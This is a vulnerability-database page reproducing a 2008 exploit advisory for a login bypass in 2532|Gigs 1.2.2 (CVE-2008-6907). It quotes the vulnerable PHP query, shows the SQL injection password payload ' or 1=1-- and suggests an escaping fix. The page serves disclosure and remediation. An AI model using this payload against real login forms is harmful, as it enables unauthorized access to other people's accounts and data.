Lucene search
+L

2532/Gigs 1.2.2 Stable - Remote Authentication Bypass

🗓️ 18 Dec 2008 00:00:00Reported by StAkeRType 
exploitdb
 exploitdb
🔗 www.exploit-db.com👁 30 Views

2532/Gigs 1.2.2 Stable Remote Authentication Bypass Vulnerability by atho

Related
Code
ReporterTitlePublishedViews
Family
circl
Circl
CVE-2008-6907
18 Dec 200800:00
circl
cve
CVE
CVE-2008-6907
6 Aug 200917:00
cve
cvelist
Cvelist
CVE-2008-6907
6 Aug 200917:00
cvelist
euvd
EUVD
EUVD-2008-6867
7 Oct 202500:30
euvd
nvd
NVD
CVE-2008-6907
6 Aug 200917:30
nvd
openvas
OpenVAS
2532|Gigs Directory Traversal And SQL Injection Multiple Vulnerabilities
20 Aug 200900:00
openvas
prion
Prion
Sql injection
6 Aug 200917:30
prion
/* ------------------------------------------------------------------------------------------------
 * 2532|Gigs 1.2.2 Stable Remote Login Bypass Vulnerability
 * ------------------------------------------------------------------------------------------------
 * by athos - staker[at]hotmail[dot]it
 * http://www.hotscripts.com/jump.php?listing_id=65863&jump_type=1
 * ------------------------------------------------------------------------------------------------
 * File Vuln checkuser.php
 *
 * 16. $username = $_POST['username'];
 * 17. $password = $_POST['password'];
 * ...
 * 41. $query = "SELECT * FROM $dbt_users WHERE username = '$username' AND password = '$password'" ;
 * 42. $result = mysql_query($query) or die ( "Error in query: $query. " . mysql_error() );
 * ------------------------------------------------------------------------------------------------
 * Exploit
 *
 * http://[host]/[path]/index.php?id=login
 *
 * Username: [username]
 * Password: [' or 1=1--]
 * ------------------------------------------------------------------------------------------------
 * Fix (Examples)
 *
 * $username = mysql_real_escape_string($_POST['username']);
 * $password = mysql_real_escape_string($_POST['password']);
 *
 * ------------------------------------------------------------------------------------------------
 */

# milw0rm.com [2008-12-18]

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

18 Dec 2008 00:00Current
5.8Medium risk
Vulners AI Score5.8
CVSS 26.8
EPSS0.00914
30